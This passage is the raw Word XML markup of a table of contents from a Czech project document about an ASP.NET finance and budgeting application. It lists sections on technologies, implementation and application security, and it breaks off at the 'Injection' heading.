          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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63" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>6.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Vozidla</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327863 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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64" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>6.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Grafický styl uživatelského rozhraní</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327864 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</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865" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Návrh implementace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327865 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>81</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66" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Použité technologie a knihovny</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327866 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>81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67" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>ASP.NET a C#</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327867 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>81</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68" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>ASP.NET MVC</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327868 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>82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69" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>ASP.NET Web API</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327869 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>82</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Microsoft SQL Server</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327870 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>83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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>HTML5 a CSS3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327871 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>83</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Bootstrap a jQuery</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327872 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>84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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Angular.js</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327873 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>84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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.1.8</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Google Charts</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327874 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</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75" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Implementace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327875 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Uživatel</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327876 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>85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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Účty</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327877 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>85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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Transakce a štítky</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327878 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</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79" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Rozpočty</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327879 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.2.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Vozidla</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327880 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</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81" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zabezpečení aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327881 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>88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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>7.3.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Injection</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
